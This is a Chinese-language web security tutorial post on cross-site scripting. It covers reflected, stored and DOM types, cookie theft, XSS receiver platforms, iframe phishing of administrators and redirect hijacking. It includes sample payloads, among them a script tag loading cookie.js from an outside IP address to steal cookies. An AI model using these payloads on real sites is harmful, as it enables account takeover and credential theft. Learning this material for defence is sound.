web安全第八天:跨站脚本攻击

1.1跨站脚本攻击概念

跨站脚本(Cross-site scripting,简称XSS),是指恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页之时,嵌入其中Web页面的JavaScript代码会被执行,从而达到恶意攻击用户的目的。

1.2漏洞成因

由于动态网页的Web应用对用户提交请求参数未做充分的检查过滤,允许用户在提交的数据中掺入HTML代码(最主要的是“>“、“<”),然后未加编码地输出到第三方用户的浏览器,这些攻击者恶意提交(payload)会被受害用户的浏览器解释执行。

1.3 Payload概念

Payload的中文含义是有效载荷,在XSS中指代攻击代码或攻击语句。

在这里插入图片描述

1.4形成的危害

获取用户信息;(如浏览器信息、ip地址、cookie 信息等)
钓鱼;(利用xss漏洞构造出一个登录框,骗取用户账户密码,提示登录过期,模拟一个网站的登录框,将用户名、密码发送到攻击者服务器)
注入木马或广告链接;(有些在主站注入非法网站的链接,对公司的声誉有一定的影响)后台增删改网站数据等操作;(配合CSRF 漏洞,骗取用户点击,利用js模拟浏览器发包)
xss蠕虫(微博蠕虫∶只要看过某人的微博就是自动关注某人;贴吧蠕虫:看过某个帖子就自动回复)

跨站脚本攻击类型及利用场景

2.1常见分类

跨站脚本攻击可以分为三类,反射型、存储型以及DOM型。
那么这三类有哪些区别呢?
反射型:Payload经过后端,不经过数据库
存储型:Payload经过后端,经过数据库DOM: Payload不经过后端

2.1.1反射型XSS
也叫做非持久型XSS。攻击者将恶意脚本附加到url的参数中,发送给受害者,服务端未经严格过滤处理而输出在用户浏览器中,导致浏览器执行代码数据。
特点:只执行一次
常见漏洞场景:搜索处
在这里插入图片描述

2.1.1 代码分析

在这里插入图片描述

2.1.2存储型XSS

也叫做持久型XSS。攻击者在数据中嵌入代码,这样当其他用户请求后,服务器从数据库中查询数据并发给用户,用户浏览此类页面时就可能受到攻击。
常见漏洞场景:多见于评论留言,个人信息等处

2.1.2代码分析

在这里插入图片描述

2.1.3 DOM型XSS

基于DOM的XSS,通过对具体DOM代码进行分析,根据实际情况构造dom节点进行XSS跨站脚本攻击。

2.1.3 代码分析

#<img src=x οnerrοr='alert(/xss/)'>

在这里插入图片描述

1.1 cookie被窃取的危害

在网页浏览中我们常常涉及到用户登录,登录完毕之后服务端会返回一个cookie值。这个cookie值相当于一个令牌,拿着这张令牌就等同于证明了你是某个用户。
如果你的cookie值被窃取,那么攻击者很可能能够直接利用你的这张令牌不用密码就登录你的账户。如果想要通过script脚本获得当前页面的cookie值,通常会用到document.cookie。

1.2 XSS Platform

一个测试XSS漏洞获取cookie的平台,XSS可以做JS能做的所有事,包括但不限于窃取cookie、后台增删改文章、钓鱼、利用XSS漏洞进行传播、修改网页代码、网站重定向、获取用户信息等。

1.3 BlueLotus_XSSReceiver

无sql版的cookie接受平台

2.1钓鱼原理

诱导用户输入网站的账号密码,被我们自己搭建在公网上的服务器获取,跳转到我们自己搭建的服务器时,,我们可以在自己的服务器上写一段代码传送获取到的账号密码跳转到的这个钓鱼页面网站的真实登入页面进行登入。

2.1.1制作钓鱼页面

为了模拟真实的登录页面,可以将原网站的登录页面的源码复制下了,然后将里面的一些路径修改为网站的地址。

2.1.2接收钓鱼信息

当受害者输入账号密码之后会通过该页面进行接收,然后返回正常的网站页面。

2.1.3 构造payload

<script src=http://139.9.198.30/cookie.js></script>

iframe元素会创建包含另外一个文档的内联框架,也就是说如果我们在网页中添加了一个iframe元素,src一个需要内联的网址,然后src的网页就会加载在当前网站,这样当我们的xss代码被触发的时候,网站就会内嵌一个我们伪造的一毛一样的钓鱼页面在管理员的浏览器上,管理员可能就以为自己退出了系统,然后重新输入用户名和密码,这样密码就会发送到我们的服务器上,我们就可以利用用户名和密码进行登录了,然后就可以进入后台为所欲为了。

2.2 流量劫持

流量劫持是指利用一些软件或者木马修改浏览器不停的弹出新的窗口强制性的让用户访问指定的网站。
在网页中想办法插入一句像这样的语句:

<script>window.location.href="http://www.baidu.com";</script>

那么所访问的网站就会被跳转到百度的首页。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值